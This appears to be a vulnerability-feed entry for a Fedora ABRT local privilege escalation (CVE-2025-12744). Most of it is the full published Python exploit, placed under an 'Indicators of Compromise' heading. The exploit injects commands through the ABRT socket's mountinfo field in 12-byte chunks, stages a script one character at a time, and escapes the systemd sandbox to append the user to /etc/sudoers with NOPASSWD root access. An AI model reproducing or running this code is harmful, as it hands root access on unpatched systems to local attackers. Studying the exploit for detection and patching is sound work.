This is a local privilege escalation vulnerability affecting Fedora systems. An exploit has been published that allows an attacker with local access to escalate privileges. The exploit code is available and written in Python. No specific affected versions or patch information is provided.

AI Analysis

Indicators of Compromise

• exploit-code: Exploit Title: Fedora Local Privilege Escalation via ABRT Date: 07-October-2025 Exploit Author: initstring Vendor Homepage: https://fedoraproject.org Software Link: https://fedoraproject.org/server/download Version: Fedora 43 and below (running ABRT v 2.17.7 and below) Tested on: Fedora 42 Workstation & Server, Fedora 43 Workstation & Server CVE : CVE-2025-12744 """ abrt_root: local privilege escalation vulnerability in Fedora's ABRT Research and development by initstring. """ import getpass import socket import time import uuid from pathlib import Path BANNER = """ #################################################################### abrt_root: local privilege escalation vulnerability in Fedora's ABRT Research and development by initstring. #################################################################### """ SOCKET_PATH = "/var/run/abrt/abrt.socket" HELPER_SCRIPT_NAME = "final" RESET_TOKEN = ";:>q;:;:;:;:" EXEC_TOKEN = ";sh\tq;:;:;:;" APPEND_TEMPLATE = ";printf\t{char}>>q" MAX_RETRIES = 10 SLEEP_BETWEEN_TOKENS = 0.5 def build_body(payload: str, reason: str, unique: str) -> bytes: pid = str(int(unique[:4], 16) % 30000 + 1).encode() cmdline = f"/usr/bin/python3 {unique}".encode() container_cmd = f"/usr/bin/docker run test {unique}".encode() type_tag = f"Python3-{unique[:6]}".encode() fields = [ (b"type", type_tag), (b"reason", reason.encode()), (b"pid", pid), (b"executable", f"/usr/bin/python3-{unique}".encode()), (b"cmdline", cmdline), (b"container_cmdline", container_cmd), (b"mountinfo", b"74 2 0:36 / / rw,relatime shared:1 - ext4 " + payload.encode() + b"\n"), (b"backtrace", f"trace {reason} {unique}".encode()), (b"uuid", unique.encode()), (b"duphash", unique.encode()), ] body = bytearray() for key, value in fields: body += key + b"=" + value + b"\0" return bytes(body) def send_once(payload: str) -> str: token = "/docker-" + payload unique = uuid.uuid4().hex reason = f"auto root {int(time.time())}-{unique[:6]}" blob = b"POST / HTTP/1.1\r\n\r\n" + build_body(token, reason, unique) with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock: sock.connect(SOCKET_PATH) sock.sendall(blob) sock.shutdown(socket.SHUT_WR) reply = sock.recv(4096).decode(errors="ignore").strip() return reply or "<no response>" def send_with_retry(payload: str) -> None: for attempt in range(1, MAX_RETRIES + 1): reply = send_once(payload) # DEBUG # print(f"[{payload!r}] attempt {attempt}: {reply}") if "201" in reply: time.sleep(SLEEP_BETWEEN_TOKENS) return time.sleep(SLEEP_BETWEEN_TOKENS) raise RuntimeError(f"Failed to send payload '{payload}' with HTTP 201") def token_for_char(ch: str) -> str: token = APPEND_TEMPLATE.format(char=ch) if len(token) != 12: raise ValueError(f"Character {ch!r} produced token length {len(token)}") return token def main() -> None: print(BANNER) # First we write out the third/final stage to a script in the current working directory. # It contains our ultimate goal - escaping the systemd sandbox to write our current # low-priv user name to /etc/sudoers to give us root access. current_user = getpass.getuser() cwd = Path.cwd() helper_script_path = cwd / HELPER_SCRIPT_NAME helper_script_path.write_text( f"systemd-run --pty -- bash -lc \"echo '{current_user} ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers\"\n", encoding="ascii", ) helper_script_path.chmod(0o755) # Next we build the text which will be written to the second stage script. # It is meant to call the third stage script. Characters are limited in this second stage # script, which is why we can't just list the complex commands from above. # The PWD vars you see are not resolved here in the Python script - they are instead # resolved when the targeted daemon executes the script. It has `PWD=/` in its context # which allows us to write the `/` which otherwise is filtered out during this stage # of the attack. command = "${PWD}" + "${PWD}".join(helper_script_path.resolve().parts[1:]) # The reset token just clears the file (/q) where we are writing that second stage to. print("[+] Executing stage one...") send_with_retry(RESET_TOKEN) time.sleep(3) # This is stage one of the attack. We have just enough bytes to perfectly inject a # command which will append one character to a file. It loops through to write out # the second stage script to `/q` for index, ch in enumerate(command, 1): token = token_for_char(ch) # DEBUG # print(f"[+] Staging char {index}/{len(command)} -> {token!r}") send_with_retry(token) # This uses the same 12-byte gadget to execute the stage two script that has # now been written to `/q`. That script, in turn, executes the stage three script # which has no character limitations and completes the exploit. print("[+] Chaining execution of stage two and three...") send_with_retry(EXEC_TOKEN) print("\n[+] Now you're playing with power.") if __name__ == "__main__": main()